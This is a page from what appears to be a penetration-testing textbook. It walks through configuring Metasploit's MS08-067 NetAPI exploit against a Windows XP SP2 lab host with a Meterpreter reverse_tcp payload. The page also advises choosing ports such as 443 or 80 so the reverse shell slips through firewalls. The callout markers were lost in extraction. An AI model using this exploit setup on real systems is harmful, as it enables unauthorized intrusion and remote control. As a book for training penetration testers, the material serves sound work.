The Joy of Exploitation
67
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.33.130 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST 192.168.33.129 yes The local address
LPORT 8080 yes The local port
Exploit target:
Id Name
-- ----
3 Windows XP SP2 English (NX)
We search for the MS08-067 NetAPI exploit in the Framework at .
Then, having found our exploit, we load the
windows/smb/ms08_067_netapi
exploit at .
Next, at we set the payload as Windows-based Meterpreter
reverse_tcp
,
which, if successful, will start a connection on the target machine and con-
nect back to the attacking machine specified with
LHOST
. This is important if
you find that a firewall is in place and you need to bypass incoming controls
on a firewall or NAT.
Meterpreter
is a post exploitation tool that we’ll use through this book. One
of Metasploit’s flagship tools, it makes extracting information or further
compromising systems significantly easier.
The
show targets
command at allows us to identify the system we want
to target. (Although many MSF exploits use automatic targeting and don’t
require this flag, autodetection capability generally fails in MS08-067.)
We then set our target to
Windows XP SP2 English (NX)
at . The
NX
stands
for No Execute. By default in Windows XP SP2, DEP is enabled.
At we set the IP address of our target machine which, by defining the
RHOST
value, is vulnerable to the MS08-067 exploit.
The
set LHOST
command at specifies our attacking machine’s IP address
(the Back|Track machine), and the
LPORT
option at specifies the port to
which our attacker machine will listen for a connection from our target. (When
you’re setting the
LPORT
option, use a standard port that you think will be
allowed through the firewall: Ports 443, 80, 53, and 8080 are often good
options.) Finally, we enter
show options
at to make sure that the options are
set up correctly.